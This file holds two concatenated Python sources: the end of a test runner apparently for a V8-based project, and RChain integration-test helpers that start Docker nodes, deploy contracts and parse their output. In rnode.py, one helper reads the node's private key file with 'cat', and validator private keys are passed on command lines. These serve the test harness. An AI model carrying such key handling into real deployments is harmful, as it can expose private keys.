sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = [ ]
all_outcomes = set([])
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes = set([])
for rule in matches:
outcomes = outcomes.union(rule.GetOutcomes(env, self.defs))
unused_rules.discard(rule)
if not outcomes:
outcomes = [PASS]
case.outcomes = outcomes
all_outcomes = all_outcomes.union(outcomes)
result.append(ClassifiedTest(case, outcomes))
return (result, list(unused_rules), all_outcomes)
class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
set = self.value.GetOutcomes(env, defs)
assert isinstance(set, ListSet)
return set.elms
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in xrange(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
print "Malformed line: '%s'." % line
return False
return True
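# Illustrative sketch (not taken from any real status file) of the syntax that
# ReadConfigurationInto() accepts, per the patterns above: 'prefix' scopes later
# rule paths, '[ ... ]' opens a section whose condition goes through
# ParseCondition, 'def NAME = ...' binds a reusable outcome set, and
# 'path/glob : OUTCOMES' adds a rule. For example:
#   prefix simple
#   def FAIL_OK = FAIL, OKAY
#   [ $system == windows ]
#   test-http-*: PASS || TIMEOUT
#   test-fs-watch: FAIL_OK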
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option("-S", dest="scons_flags", help="Flag to pass through to scons",
default=[], action="append")
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono)",
choices=PROGRESS_INDICATORS.keys(), default="mono")
result.add_option("--no-build", help="Don't build requirements",
default=True, action="store_true")
result.add_option("--build-only", help="Only build requirements, don't run the tests",
default=False, action="store_true")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=60, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--simulator", help="Run tests with architecture simulator",
default='none')
result.add_option("--special-command", default=None)
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--shell", help="Path to V8 shell", default="shell")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
return result
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
options.mode = options.mode.split(',')
for mode in options.mode:
if not mode in ['debug', 'release']:
print "Unknown mode %s" % mode
return False
if options.simulator != 'none':
# Simulator argument was set. Make sure arch and simulator agree.
if options.simulator != options.arch:
if options.arch == 'none':
options.arch = options.simulator
else:
print "Architecture %s does not match sim %s" %(options.arch, options.simulator)
return False
# Ensure that the simulator argument is handed down to scons.
options.scons_flags.append("simulator=" + options.simulator)
else:
# If options.arch is not set by the command line and no simulator setting
# was found, set the arch to the guess.
if options.arch == 'none':
options.arch = ARCH_GUESS
options.scons_flags.append("arch=" + options.arch)
if options.snapshot:
options.scons_flags.append("snapshot=on")
return True
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(nocrash)4d tests are expected to be flaky but not crash
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
def PrintReport(cases):
def IsFlaky(o):
return (PASS in o) and (FAIL in o) and (not CRASH in o) and (not OKAY in o)
def IsFailOk(o):
return (len(o) == 2) and (FAIL in o) and (OKAY in o)
unskipped = [c for c in cases if not SKIP in c.outcomes]
print REPORT_TEMPLATE % {
'total': len(cases),
'skipped': len(cases) - len(unskipped),
'nocrash': len([t for t in unskipped if IsFlaky(t.outcomes)]),
'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]),
'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]),
'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]])
}
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
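# Illustrative only: Pattern matches a whole path component, with '*' acting as
# a wildcard, e.g. Pattern('test-http-*').match('test-http-parser') is truthy
# while Pattern('test-http-*').match('test-net-server') is None.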
def SplitPath(s):
stripped = [ c.strip() for c in s.split('/') ]
return [ Pattern(s) for s in stripped if len(s) > 0 ]
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
pos = value.find('@')
import urllib
prefix = urllib.unquote(value[:pos]).split()
suffix = urllib.unquote(value[pos+1:]).split()
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
BUILT_IN_TESTS = ['simple', 'pummel', 'message', 'internet']
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
workspace = abspath(join(dirname(sys.argv[0]), '..'))
suites = GetSuites(join(workspace, 'test'))
repositories = [TestRepository(join(workspace, 'test', name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories)
if len(args) == 0:
paths = [SplitPath(t) for t in BUILT_IN_TESTS]
else:
paths = [ ]
for arg in args:
path = SplitPath(arg)
paths.append(path)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
shell = abspath(options.shell)
buildspace = dirname(shell)
context = Context(workspace, buildspace, VERBOSE,
shell,
options.timeout,
GetSpecialCommandProcessor(options.special_command),
options.suppress_dialogs,
options.store_unexpected_output)
# First build the required targets
if not options.no_build:
reqs = [ ]
for path in paths:
reqs += root.GetBuildRequirements(path, context)
reqs = list(set(reqs))
if len(reqs) > 0:
if options.j != 1:
options.scons_flags += ['-j', str(options.j)]
if not BuildRequirements(context, reqs, options.mode, options.scons_flags):
return 1
# Just return if we are only building the targets for running the tests.
if options.build_only:
return 0
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for mode in options.mode:
if not exists(context.GetVm(mode)):
print "Can't find shell executable: '%s'" % context.GetVm(mode)
continue
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': options.arch,
'simulator': options.simulator
}
test_list = root.ListTests([], path, context, mode)
unclassified_tests += test_list
(cases, unused_rules, all_outcomes) = config.ClassifyTests(test_list, env)
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = globally_unused_rules.intersection(unused_rules)
all_cases += cases
all_unused.append(unused_rules)
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print "--- begin source: %s ---" % test.GetLabel()
source = test.GetSource().strip()
print source
print "--- end source: %s ---" % test.GetLabel()
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path])
if options.report:
PrintReport(all_cases)
result = None
def DoSkip(case):
return SKIP in case.outcomes or SLOW in case.outcomes
cases_to_run = [ c for c in all_cases if not DoSkip(c) ]
if len(cases_to_run) == 0:
print "No tests to run."
return 0
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print "Interrupted"
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ]
timed_tests.sort(lambda a, b: a.CompareTime(b))
index = 1
for entry in timed_tests[:20]:
t = FormatTime(entry.duration)
sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel()))
index += 1
return result
if __name__ == '__main__':
sys.exit(Main())
|
rnode.py
|
import functools
import re
import os
import queue
import shlex
import string
import shutil
import logging
from logging import (Logger)
import threading
from threading import Event
import contextlib
from multiprocessing import Queue, Process
from typing import (
Dict,
List,
Tuple,
Optional,
Generator,
AbstractSet,
Set
)
from rchain.crypto import PrivateKey
from rchain.certificate import get_node_id_raw
from rchain.vault import DEFAULT_PHLO_LIMIT, DEFAULT_PHLO_PRICE
from cryptography.hazmat.primitives.serialization import load_pem_private_key
from cryptography.hazmat.backends import default_backend
from docker.client import DockerClient
from docker.models.containers import Container
from docker.models.containers import ExecResult
from .common import (
make_tempdir,
make_tempfile,
TestingContext,
NonZeroExitCodeError,
GetBlockError,
ParsingError,
SynchronyConstraintError,
NotAnActiveValidatorError
)
from .wait import (
wait_for_node_started,
wait_for_approved_block_received_handler_state,
)
from .error import(
RNodeAddressNotFoundError,
CommandTimeoutError,
)
from .utils import (
extract_block_count_from_show_blocks,
parse_show_block_output,
parse_show_blocks_output,
extract_block_hash_from_propose_output,
extract_deploy_id_from_deploy_output,
parse_mvdag_str,
BlockInfo,
LightBlockInfo
)
DEFAULT_IMAGE = os.environ.get("DEFAULT_IMAGE", "rchain-integration-tests:latest")
_PB_REPEATED_STR_SEP = "#$"
rnode_binary = '/opt/docker/bin/rnode'
rnode_directory = "/var/lib/rnode"
rnode_deploy_dir = "{}/deploy".format(rnode_directory)
rnode_bonds_file = '{}/genesis/bonds.txt'.format(rnode_directory)
rnode_wallets_file = '{}/genesis/wallets.txt'.format(rnode_directory)
rnode_certificate_path = '{}/node.certificate.pem'.format(rnode_directory)
rnode_key_path = '{}/node.key.pem'.format(rnode_directory)
rnode_default_launcher_args = [
# We don't want the launcher script (generated by sbt-native-packager) to
# swallow first java error and exit with confusing "No java installation was
# detected" message.
'-no-version-check',
]
class Node:
def __init__(self, *, container: Container, deploy_dir: str, command_timeout: int, network: str) -> None:
self.container = container
self.local_deploy_dir = deploy_dir
self.remote_deploy_dir = rnode_deploy_dir
self.name = container.name
self.command_timeout = command_timeout
self.network = network
self.terminate_background_logging_event = threading.Event()
self.background_logging = LoggingThread(
container=container,
logger=logging.getLogger('peers'),
terminate_thread_event=self.terminate_background_logging_event,
)
self.background_logging.daemon = True
self.background_logging.start()
def __repr__(self) -> str:
return '<Node(name={})>'.format(repr(self.name))
def get_node_pem_cert(self) -> bytes:
return self.shell_out("cat", rnode_certificate_path).encode('utf8')
def get_node_pem_key(self) -> bytes:
return self.shell_out("cat", rnode_key_path).encode('utf8')
def get_node_id_raw(self) -> bytes:
key = load_pem_private_key(self.get_node_pem_key(), None, default_backend())
return get_node_id_raw(key)
def logs(self) -> str:
return self.container.logs().decode('utf-8')
def get_rnode_address(self) -> str:
log_content = self.logs()
regex = "Listening for traffic on (rnode://.+@{name}\\?protocol=\\d+&discovery=\\d+)\\.$".format(name=self.container.name)
match = re.search(regex, log_content, re.MULTILINE | re.DOTALL)
if match is None:
raise RNodeAddressNotFoundError(regex)
address = match.group(1)
return address
def get_metrics(self) -> str:
return self.shell_out('curl', '-s', 'http://localhost:40403/metrics')
def get_connected_peers_metric_value(self) -> str:
try:
return self.shell_out('sh', '-c', 'curl -s http://localhost:40403/metrics | grep ^rchain_comm_rp_connect_peers\\ ')
except NonZeroExitCodeError as e:
if e.exit_code == 1:
return ''
raise
def get_peer_node_ip(self, network_name: str) -> str:
self.container.reload()
network_config = self.container.attrs['NetworkSettings']['Networks'][network_name]
assert network_config is not None
return network_config['IPAddress']
def cleanup(self) -> None:
self.container.remove(force=True, v=True)
self.terminate_background_logging_event.set()
self.background_logging.join()
def show_blocks_with_depth(self, depth: int) -> str:
return self.rnode_command('show-blocks', '--depth', str(depth), stderr=False)
def show_block(self, hash: str) -> str:
return self.rnode_command('show-block', hash, stderr=False)
def get_blocks_count(self, depth: int) -> int:
show_blocks_output = self.show_blocks_with_depth(depth)
return extract_block_count_from_show_blocks(show_blocks_output)
def show_blocks_parsed(self, depth: int) -> List[LightBlockInfo]:
show_blocks_output = self.show_blocks_with_depth(depth)
return parse_show_blocks_output(show_blocks_output)
def show_block_parsed(self, hash: str) -> BlockInfo:
show_block_output = self.show_block(hash)
block_info = parse_show_block_output(show_block_output)
return block_info
def get_block(self, block_hash: str) -> str:
try:
return self.rnode_command('show-block', block_hash, stderr=False)
except NonZeroExitCodeError as e:
raise GetBlockError(command=e.command, exit_code=e.exit_code, output=e.output)
# Too low level -- do not use directly. Prefer shell_out() instead.
def _exec_run_with_timeout(self, cmd: Tuple[str, ...], stderr: bool = True) -> Tuple[int, str]:
control_queue: queue.Queue = Queue(1)
def command_process() -> None:
exec_result: ExecResult = self.container.exec_run(cmd, stderr=stderr)
control_queue.put((exec_result.exit_code, exec_result.output.decode('utf-8')))
process = Process(target=command_process)
logging.info("COMMAND {} {}".format(self.name, cmd))
process.start()
try:
exit_code, output = control_queue.get(True, self.command_timeout)
except queue.Empty:
raise CommandTimeoutError(cmd, self.command_timeout)
finally:
process.terminate()
if exit_code != 0:
for line in output.splitlines():
logging.info('{}: {}'.format(self.name, line))
logging.warning("EXITED {} {} {}".format(self.name, cmd, exit_code))
else:
for line in output.splitlines():
logging.debug('{}: {}'.format(self.name, line))
logging.debug("EXITED {} {} {}".format(self.name, cmd, exit_code))
return exit_code, output
def shell_out(self, *cmd: str, stderr: bool = True) -> str:
exit_code, output = self._exec_run_with_timeout(cmd, stderr=stderr)
if exit_code != 0:
raise NonZeroExitCodeError(command=cmd, exit_code=exit_code, output=output)
return output
def rnode_command(self, *node_args: str, stderr: bool = True) -> str:
return self.shell_out(rnode_binary, *rnode_default_launcher_args, *node_args, stderr=stderr)
def eval(self, rho_file_path: str) -> str:
return self.rnode_command('eval', rho_file_path)
def deploy(self, rho_file_path: str, private_key: PrivateKey, phlo_limit:int = DEFAULT_PHLO_LIMIT, phlo_price: int = DEFAULT_PHLO_PRICE) -> str:
try:
output = self.rnode_command('deploy', '--private-key={}'.format(private_key.to_hex()), '--phlo-limit={}'.format(phlo_limit), '--phlo-price={}'.format(phlo_price), rho_file_path, stderr=False)
deploy_id = extract_deploy_id_from_deploy_output(output)
return deploy_id
except NonZeroExitCodeError as e:
if "Parsing error" in e.output:
raise ParsingError(command=e.command, exit_code=e.exit_code, output=e.output)
# TODO out of phlogiston error
raise e
def get_vdag(self) -> str:
return self.rnode_command('vdag', stderr=False)
def get_mvdag(self) -> str:
return self.rnode_command('mvdag', stderr=False)
def get_parsed_mvdag(self) -> Dict[str, Set[str]]:
return parse_mvdag_str(self.get_mvdag())
def deploy_string(self, rholang_code: str, private_key: str, phlo_limit:int = DEFAULT_PHLO_LIMIT, phlo_price: int = DEFAULT_PHLO_PRICE) -> str:
quoted_rholang = shlex.quote(rholang_code)
deploy_out = self.shell_out('sh', '-c', 'echo {quoted_rholang} >/tmp/deploy_string.rho && {rnode_binary} deploy --private-key={private_key} --phlo-limit={phlo_limit} --phlo-price={phlo_price} /tmp/deploy_string.rho'.format(
rnode_binary=rnode_binary,
quoted_rholang=quoted_rholang,
private_key=private_key,
phlo_limit=phlo_limit,
phlo_price=phlo_price
), stderr=False)
return extract_deploy_id_from_deploy_output(deploy_out)
def find_deploy(self, deploy_id: str) -> LightBlockInfo:
output = self.rnode_command("find-deploy", "--deploy-id", deploy_id, stderr=False)
block_info = parse_show_blocks_output(output)
return block_info[0]
def propose(self) -> str:
try:
output = self.rnode_command('propose', stderr=False)
block_hash = extract_block_hash_from_propose_output(output)
return block_hash
except NonZeroExitCodeError as e:
if "Must wait for more blocks from other validators" in e.output:
raise SynchronyConstraintError(command=e.command, exit_code=e.exit_code, output=e.output)
if "ReadOnlyMode" in e.output:
raise NotAnActiveValidatorError(command=e.command, exit_code=e.exit_code, output=e.output)
raise e
def last_finalized_block(self) -> BlockInfo:
output = self.rnode_command('last-finalized-block', stderr=False)
block_info = parse_show_block_output(output)
return block_info
def repl(self, rholang_code: str, stderr: bool = False) -> str:
quoted_rholang_code = shlex.quote(rholang_code)
output = self.shell_out(
'sh',
'-c',
'echo {quoted_rholang_code} | {rnode_binary} repl'.format(quoted_rholang_code=quoted_rholang_code,rnode_binary=rnode_binary),
stderr=stderr,
)
return output
def cat_forward_file(self, public_key: str) -> str:
return self.shell_out('cat', '/opt/docker/forward_{}.rho'.format(public_key))
def cat_bond_file(self, public_key: str) -> str:
return self.shell_out('cat', '/opt/docker/bond_{}.rho'.format(public_key))
__timestamp_rx = "\\d\\d:\\d\\d:\\d\\d\\.\\d\\d\\d"
__log_message_rx = re.compile("^{timestamp_rx} (.*?)(?={timestamp_rx})".format(timestamp_rx=__timestamp_rx), re.MULTILINE | re.DOTALL)
def log_lines(self) -> List[str]:
log_content = self.logs()
return Node.__log_message_rx.split(log_content)
def deploy_contract_with_substitution(self, substitute_dict: Dict[str, str], rho_file_path: str, private_key: PrivateKey, phlo_limit:int = DEFAULT_PHLO_LIMIT, phlo_price: int = DEFAULT_PHLO_PRICE) -> str:
"""
Supposed that you have a contract with content like below.
new x in { x!("#DATA") }
If you pass a dict {'#DATA': "123456"} as substitute_dict args in this func,
this method would substitute the string #DATA in the contract with 123456, which turns out to be
new x in { x!("123456") }
And then deploy the contract in the node
"""
shutil.copyfile(rho_file_path, os.path.join(self.local_deploy_dir, os.path.basename(rho_file_path)))
container_contract_file_path = os.path.join(self.remote_deploy_dir, os.path.basename(rho_file_path))
substitute_rules = ';'.join([r's/{}/{}/g'.format(key.replace(r'/', r'\/'), value.replace(r'/', r'\/')) for key, value in substitute_dict.items()])
self.shell_out(
'sed',
'-i',
'-e', substitute_rules,
container_contract_file_path,
)
self.deploy(container_contract_file_path, private_key, phlo_limit, phlo_price)
block_hash = self.propose()
return block_hash
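# Illustrative usage sketch (not part of the original file; the fixture, key and
# contract path below are assumptions):
#
#   block_hash = node.deploy_contract_with_substitution(
#       substitute_dict={'#DATA': '123456'},
#       rho_file_path='resources/storage.rho',   # hypothetical contract file
#       private_key=context.bootstrap_key,       # hypothetical PrivateKey
#   )
#
# The call copies the contract into the node's deploy directory, rewrites every
# occurrence of '#DATA' via sed, deploys the result and proposes a block.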
class LoggingThread(threading.Thread):
def __init__(self, terminate_thread_event: Event, container: Container, logger: Logger) -> None:
super().__init__()
self.terminate_thread_event = terminate_thread_event
self.container = container
self.logger = logger
def run(self) -> None:
containers_log_lines_generator = self.container.logs(stream=True, follow=True)
try:
while True:
if self.terminate_thread_event.is_set():
break
line = next(containers_log_lines_generator)
self.logger.info('{}: {}'.format(self.container.name, line.decode('utf-8').rstrip()))
except StopIteration:
pass
class DeployThread(threading.Thread):
def __init__(self, name: str, node: Node, contract: str, count: int, private_key: PrivateKey) -> None:
threading.Thread.__init__(self)
self.name = name
self.node = node
self.contract = contract
self.count = count
self.private_key = private_key
def run(self) -> None:
for _ in range(self.count):
self.node.deploy(self.contract, self.private_key)
self.node.propose()
def make_container_command(container_command: str, container_command_flags: AbstractSet, container_command_options: Dict) -> str:
opts = ['{} {}'.format(option, argument) for option, argument in container_command_options.items()]
flags = ' '.join(container_command_flags)
result = '{} {} {}'.format(container_command, flags, ' '.join(opts))
return result
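# Illustrative only (inputs made up for this sketch):
#   make_container_command('run', {'--standalone'}, {'--port': 40400, '--host': 'bootstrap'})
# returns a string such as 'run --standalone --port 40400 --host bootstrap'
# (flag and option ordering follows set/dict iteration order).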
def make_node(
*,
docker_client: DockerClient,
name: str,
network: str,
bonds_file: str,
container_command: str,
container_command_flags: AbstractSet,
container_command_options: Dict,
command_timeout: int,
extra_volumes: Optional[List[str]],
allowed_peers: Optional[List[str]],
image: str = DEFAULT_IMAGE,
mem_limit: Optional[str] = None,
wallets_file: Optional[str] = None,
) -> Node:
assert isinstance(name, str)
assert '_' not in name, 'Underscore is not allowed in host name'
deploy_dir = make_tempdir("rchain-integration-test")
hosts_allow_file_content = \
"ALL:ALL" if allowed_peers is None else "\n".join("ALL: {}".format(peer) for peer in allowed_peers)
hosts_allow_file = make_tempfile("hosts-allow-{}".format(name), hosts_allow_file_content)
hosts_deny_file = make_tempfile("hosts-deny-{}".format(name), "ALL: ALL")
command = make_container_command(container_command, container_command_flags, container_command_options)
env = {}
java_options = os.environ.get('_JAVA_OPTIONS')
if java_options is not None:
env['_JAVA_OPTIONS'] = java_options
logging.debug('Using _JAVA_OPTIONS: {}'.format(java_options))
volumes = [
"{}:/etc/hosts.allow".format(hosts_allow_file),
"{}:/etc/hosts.deny".format(hosts_deny_file),
"{}:{}".format(bonds_file, rnode_bonds_file),
"{}:{}".format(deploy_dir, rnode_deploy_dir),
]
if wallets_file is not None:
volumes.append('{}:{}'.format(wallets_file, rnode_wallets_file))
if extra_volumes:
all_volumes = volumes + extra_volumes
else:
all_volumes = volumes
logging.info('STARTING %s %s', name, command)
container = docker_client.containers.run(
image,
name=name,
user='root',
detach=True,
mem_limit=mem_limit,
network=network,
volumes=all_volumes,
command=command,
hostname=name,
environment=env,
)
node = Node(
container=container,
deploy_dir=deploy_dir,
command_timeout=command_timeout,
network=network,
)
return node
def make_bootstrap_node(
*,
docker_client: DockerClient,
network: str,
bonds_file: str,
private_key: PrivateKey,
command_timeout: int,
allowed_peers: Optional[List[str]] = None,
mem_limit: Optional[str] = None,
cli_flags: Optional[AbstractSet] = None,
cli_options: Optional[Dict] = None,
wallets_file: Optional[str] = None,
extra_volumes: Optional[List[str]] = None,
synchrony_constraint_threshold: float = 0.0,
max_peer_queue_size: int = 10,
give_up_after_skipped: int = 0,
drop_peer_after_retries: int = 0,
number_of_active_validators: int = 10,
epoch_length: int = 10000,
quarantine_length: int = 50000
) -> Node:
container_name = make_bootstrap_name(network)
container_command_flags = set([
*rnode_default_launcher_args,
"--standalone",
"--prometheus",
"--no-upnp",
"--allow-private-addresses"
])
container_command_options = {
"--port": 40400,
"--validator-private-key": private_key.to_hex(),
"--validator-public-key": private_key.get_public_key().to_hex(),
"--host": container_name,
"--synchrony-constraint-threshold": synchrony_constraint_threshold,
"--max-peer-queue-size": max_peer_queue_size,
"--give-up-after-skipped": give_up_after_skipped,
"--drop-peer-after-retries": drop_peer_after_retries,
"--number-of-active-validators": number_of_active_validators,
"--epoch-length": epoch_length,
"--quarantine-length": quarantine_length
}
if cli_flags is not None:
container_command_flags.update(cli_flags)
if cli_options is not None:
container_command_options.update(cli_options)
container = make_node(
docker_client=docker_client,
name=container_name,
network=network,
bonds_file=bonds_file,
container_command='run',
container_command_flags=container_command_flags,
container_command_options=container_command_options,
command_timeout=command_timeout,
extra_volumes=extra_volumes,
allowed_peers=allowed_peers,
mem_limit=mem_limit if mem_limit is not None else '4G',
wallets_file=wallets_file,
)
return container
def make_container_name(network_name: str, name: str) -> str:
return "{network_name}.{name}".format(network_name=network_name, name=name)
def make_bootstrap_name(network_name: str) -> str:
return make_container_name(network_name=network_name, name='bootstrap')
def make_peer_name(network_name: str, name: str) -> str:
if name.isdigit():
actual_name = 'peer{}'.format(name)
else:
actual_name = name
return make_container_name(network_name=network_name, name=actual_name)
def make_peer(
*,
docker_client: DockerClient,
network: str,
name: str,
bonds_file: str,
command_timeout: int,
bootstrap: Node,
private_key: PrivateKey,
allowed_peers: Optional[List[str]] = None,
mem_limit: Optional[str] = None,
wallets_file: Optional[str] = None,
cli_flags: Optional[AbstractSet] = None,
cli_options: Optional[Dict] = None,
extra_volumes: Optional[List[str]] = None,
synchrony_constraint_threshold: float = 0.0,
max_peer_queue_size: int = 10,
give_up_after_skipped: int = 0,
drop_peer_after_retries: int = 0,
number_of_active_validators: int = 10,
epoch_length: int = 10000,
quarantine_length: int = 50000
) -> Node:
assert isinstance(name, str)
assert '_' not in name, 'Underscore is not allowed in host name'
name = make_peer_name(network, name)
bootstrap_address = bootstrap.get_rnode_address()
container_command_flags = set([
"--prometheus",
"--no-upnp",
"--allow-private-addresses"
])
if cli_flags is not None:
container_command_flags.update(cli_flags)
container_command_options = {
"--bootstrap": bootstrap_address,
"--validator-private-key": private_key.to_hex(),
"--validator-public-key": private_key.get_public_key().to_hex(),
"--host": name,
"--synchrony-constraint-threshold": synchrony_constraint_threshold,
"--max-peer-queue-size": max_peer_queue_size,
"--give-up-after-skipped": give_up_after_skipped,
"--drop-peer-after-retries": drop_peer_after_retries,
"--number-of-active-validators": number_of_active_validators,
"--epoch-length": epoch_length,
"--quarantine-length": quarantine_length
}
if cli_options is not None:
container_command_options.update(cli_options)
container = make_node(
docker_client=docker_client,
name=name,
network=network,
bonds_file=bonds_file,
container_command='run',
container_command_flags=container_command_flags,
container_command_options=container_command_options,
command_timeout=command_timeout,
extra_volumes=extra_volumes,
allowed_peers=allowed_peers,
mem_limit=mem_limit if mem_limit is not None else '4G',
wallets_file=wallets_file,
)
return container
@contextlib.contextmanager
def started_peer(
*,
context: TestingContext,
network: str,
name: str,
bootstrap: Node,
private_key: PrivateKey,
cli_flags: Optional[AbstractSet] = None,
cli_options: Optional[Dict] = None,
extra_volumes: Optional[List[str]] = None,
synchrony_constraint_threshold: float = 0.0,
epoch_length: int = 10000,
quarantine_length: int = 50000
) -> Generator[Node, None, None]:
peer = make_peer(
docker_client=context.docker,
network=network,
name=name,
bonds_file=context.bonds_file,
bootstrap=bootstrap,
private_key=private_key,
command_timeout=context.command_timeout,
wallets_file=context.wallets_file,
cli_flags=cli_flags,
cli_options=cli_options,
extra_volumes=extra_volumes,
synchrony_constraint_threshold=synchrony_constraint_threshold,
epoch_length=epoch_length,
quarantine_length=quarantine_length
)
try:
wait_for_node_started(context, peer)
yield peer
finally:
peer.cleanup()
@contextlib.contextmanager
def bootstrap_connected_peer(
*,
context: TestingContext,
bootstrap: Node,
name: str,
private_key: PrivateKey,
cli_options: Optional[Dict[str, str]] = None,
synchrony_constraint_threshold: float = 0.0,
epoch_length: int = 10000,
quarantine_length: int = 50000
) -> Generator[Node, None, None]:
with started_peer(
context=context,
network=bootstrap.network,
name=name,
bootstrap=bootstrap,
private_key=private_key,
cli_options=cli_options,
synchrony_constraint_threshold=synchrony_constraint_threshold,
epoch_length=epoch_length,
quarantine_length=quarantine_length
) as peer:
wait_for_approved_block_received_handler_state(context, peer)
yield peer
def make_random_network_name(context: TestingContext, length: int) -> str:
return ''.join(context.random_generator.choice(string.ascii_lowercase) for m in range(length))
@contextlib.contextmanager
def docker_network(context: TestingContext, docker_client: DockerClient) -> Generator[str, None, None]:
network_name = "rchain-{}".format(make_random_network_name(context, 5))
docker_client.networks.create(network_name, driver="bridge")
try:
yield network_name
finally:
for network in docker_client.networks.list():
if network_name == network.name:
network.remove()
@contextlib.contextmanager
def started_bootstrap(
*,
context: TestingContext,
network: str,
cli_flags: Optional[AbstractSet] = None,
cli_options: Optional[Dict[str, str]] = None,
extra_volumes: Optional[List[str]] = None,
synchrony_constraint_threshold: float = 0.0,
epoch_length: int = 10000,
quarantine_length: int = 50000
) -> Generator[Node, None, None]:
bootstrap_node = make_bootstrap_node(
docker_client=context.docker,
network=network,
bonds_file=context.bonds_file,
private_key=context.bootstrap_key,
command_timeout=context.command_timeout,
cli_flags=cli_flags,
cli_options=cli_options,
wallets_file=context.wallets_file,
